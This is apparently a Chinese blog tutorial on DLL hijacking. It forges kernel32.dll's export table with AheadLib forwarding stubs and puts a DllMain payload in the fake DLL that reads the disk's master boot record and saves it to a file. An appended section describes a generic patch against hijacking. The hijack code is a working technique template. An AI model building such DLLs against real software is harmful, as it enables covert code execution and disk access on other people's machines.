DLL劫持技术

DLL劫持技术不想再多说了,具体的可以百度。。。。

先简单的说一句。。。运行一个PE文件,WINDOWS会首先在当前目录下寻找要用的DLL,如果找不到就上其他地方找,一直到系统目录。。。

然后想干嘛就干嘛了。。。

首先得伪造,别告诉我随便找个PE文件然后改一下名字就是伪造了。。。。

怎么伪造呢?当然是伪造导入表。

这里以劫持kernel32.dll来做一个读取硬盘的例子,做什么都可以的。。。反正我是想不到了

咳咳 是的,伪造导入表是很麻烦的工作,还得写转发的代码。如果某DLL的导入表很多(比如kernel32.dll和user32.dll),那你还没写成就先累死了。。。。。

这里以kernel32.dll为例(导入表好多好多的)

某个kernel32.dll的部分导出函数如下:

#pragma comment(linker, "/EXPORT:ActivateActCtx=_AheadLib_ActivateActCtx,@5")
#pragma comment(linker, "/EXPORT:AddAtomA=_AheadLib_AddAtomA,@6")
#pragma comment(linker, "/EXPORT:AddAtomW=_AheadLib_AddAtomW,@7")
#pragma comment(linker, "/EXPORT:AddConsoleAliasA=_AheadLib_AddConsoleAliasA,@8")
#pragma comment(linker, "/EXPORT:AddConsoleAliasW=_AheadLib_AddConsoleAliasW,@9")
#pragma comment(linker, "/EXPORT:AddDllDirectory=_AheadLib_AddDllDirectory,@10")

还有不少的呢,总共1000多行。。。。
这里推荐一款很好用的自动生成工具:



使用很简单。用默认的就可以。。。

然后你可以在生成的代码中找到

AheadLib_原DLL导出函数名()

比如

ALCDECL AheadLib_MulDiv(void)
{
	GetAddress("MulDiv");
	__asm JMP EAX;
}

在这里,你可以添加一些自己的代码。。。

这里我们的目的是在被劫持的kernel32.dll启动就弹出一些对话框,然后读取硬盘的主引导记录


BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
	if (dwReason == DLL_PROCESS_ATTACH)
	{
		DisableThreadLibraryCalls(hModule);
		FILE *DiskFile;
		FILE *MBRCode;
		unsigned char Code[DISKSIZE]={0};
		DiskFile=fopen("\\\\.\\PhysicalDrive0","rb+");
		MsgBox("判断硬盘主引导记录是否能被读取,点击[确定]按钮继续");
		if(!DiskFile)
		{
			MsgBox("打开硬盘失败");
			goto Exit;
		}
		else if(!feof(DiskFile))
		{
			fseek(DiskFile,0,SEEK_SET);//移动到主引导记录的位置
			fread(Code,1,DISKSIZE,DiskFile);
			if(Code[510]==85 && Code[511]==170)
			{
				MsgBox("系统可以识别主引导记录");
				MsgBox("点击[确定]将MBR保存到当前目录")
			}
			else
			{
				MsgBox("系统不能识别主引导记录");
				MsgBox("点击[确定]将MBR保存到当前目录");
			}
			MBRCode=fopen("MBR.ini","wb+");
			if(!MBRCode)
			{
				MsgBox("备份主引导记录失败");
				goto Exit;
			}else if(!feof(MBRCode))
			{
				fwrite(Code,DISKSIZE,1,MBRCode);
				fclose(MBRCode);
				fclose(DiskFile);
				MsgBox("主引导记录备份成功,文件名是当前目录下的 MBR.ini");
			}
		}
Exit:
		return Load();
	}
	else if (dwReason == DLL_PROCESS_DETACH)
		Free();
	return TRUE;
}


我有一个加了VMP壳的CM,这个在启动时用到了kernel32.dll中的一个或者多个函数。双击它


一直点击到:

当点击到这里时,程序的窗口才会显示
好啦,把用到的工具一起传上来吧

下载地址:http://pan.baidu.com/s/1kTX1MB1

  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
易语言是一种简单易学的编程语言,可以用来编写Windows下的应用程序。在编写dll劫持补丁时,可以使用易语言来实现。 首先,dll劫持是指通过修改被劫持的进程加载的dll路径或名称,使其加载恶意的dll文件。编写dll劫持补丁实际上是为了修复这个漏洞,使被劫持的进程加载正确的dll文件。 在易语言中,可以使用WinAPI函数来完成这个任务。首先,需要用到的函数有以下几个:LoadLibrary函数,用于加载dll文件;GetModuleFileName函数,用于获取正在运行的进程模块的文件名;GetWindowsDirectory函数,用于获取Windows目录;GetProcAddress函数,用于获取函数地址;SetWindowText函数,用于设置窗口文本。 具体的步骤如下: 1. 使用GetModuleFileName函数获取当前运行的进程的文件名; 2. 使用GetWindowsDirectory函数获取Windows目录; 3. 使用SetWindowText函数设置窗口文本,提示正在修复dll劫持; 4. 使用LoadLibrary函数加载正确的dll文件; 5. 使用GetProcAddress函数获取正确的函数地址; 6. 修改被劫持函数指针为正确的地址; 7. 修复完成后,使用SetWindowText函数恢复窗口文本。 以上就是使用易语言编写dll劫持补丁的基本思路和步骤。需要注意的是,这只是一种简单的办法,不能解决所有的dll劫持问题,对于复杂的劫持行为可能需要使用其他更底层的编程语言和技术进行修复。同时,在使用这种修复方法时,也要遵循法律法规,确保程序的合法性和正当性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值